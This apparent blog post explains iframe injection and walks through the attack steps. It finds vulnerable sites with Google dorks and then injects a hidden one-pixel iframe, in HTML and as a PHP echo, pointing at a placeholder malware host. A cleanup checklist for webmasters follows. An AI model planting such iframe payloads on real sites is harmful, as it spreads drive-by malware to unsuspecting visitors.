What is an IFrame Injection? Mass IFrame Attack Tutorial


Recently 90000 webpages infected by Iframe Injection attack.  Here i am going to explain what  IFrame Injection is.

What is an IFrame Injection?
Using IFrame tag, The Attackers injects the malware contain website(links) using Cross site Scripting in popular websites.  So if the usual visitors of that popular sites opens the website, it will redirect to malware contain website.  Malware  will be loaded to your computer, now you are infected


What is IFrame Tag?
<Iframe> tag stands for Inline Frame.  It is used to insert contents from another website or server.  That can be useful for building online applications.

IFrame Injection Attack:
Malware Attackers use this IFrame and include the malware websites. They are able to include the webpage one pixel square(You won't able to see it in webpage). Obfuscate the JavaScript that will run automatically from that included page so that it looks something like %6C%20%66%72%61%6D%65%62%6F - leaving no obvious clue that it's malicious.

What an attacker can do with Iframe Injection?
Using Iframe Injection, an attacker can inject advertisements inside any other websites, insert malware infected site links, redirect to malware infected sites and more.

Iframe Injection Tutorial:
1.First of all attacker will find the Vulnerable websites using google dorks.
2. They test the vulnerability by inserting some iframe tag using the url.
3. then insert the Malicious Iframe code inside the webpage.
For Example:
he can insert this code using the url:
<iframe src=”http://malwarewebpages/web.html” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

For php webpages:
echo “<iframe src=\”http://malwarewebpages/web.html\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

Obfuscate javascript
<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){… 

4. So if the clients load page, his system will be infected.


What you have to do ,if youinfected by Iframe Injection?


  1. Change your passwords of ftp, control panel and database.
  2. Inform to your hosting service about the injection attack and they will take care of server injection .
  3. Download all your files from the hosting and  check whether they are infected or not. if you found any infected files, clean it.
  4. Buy a good antivirus software, Scan your Computer completely.
  5. Don't use the Public systems for logging into your Hosting service.
Webmasters  should take care(affects page rank,visitors) 
Webmaster, If you find your website is infected by Iframe Injection, then try to clean it as soon as possible before google detects it.  If the google detects it, it will show the Pop up message to your users " This site may harm your computer". Definitely , users won't come back to your site .  Also google will set black mark for your website.  You will lost your page rank and visitors.


If you want to check the what google thinks about your websites, then use this link:
http://www.google.com/safebrowsing/diagnostic?site=http://siteurl


This is purely for Educational purpose only. Don't use it for illegal.if you do,  you will be in jail.

No comments:

Post a Comment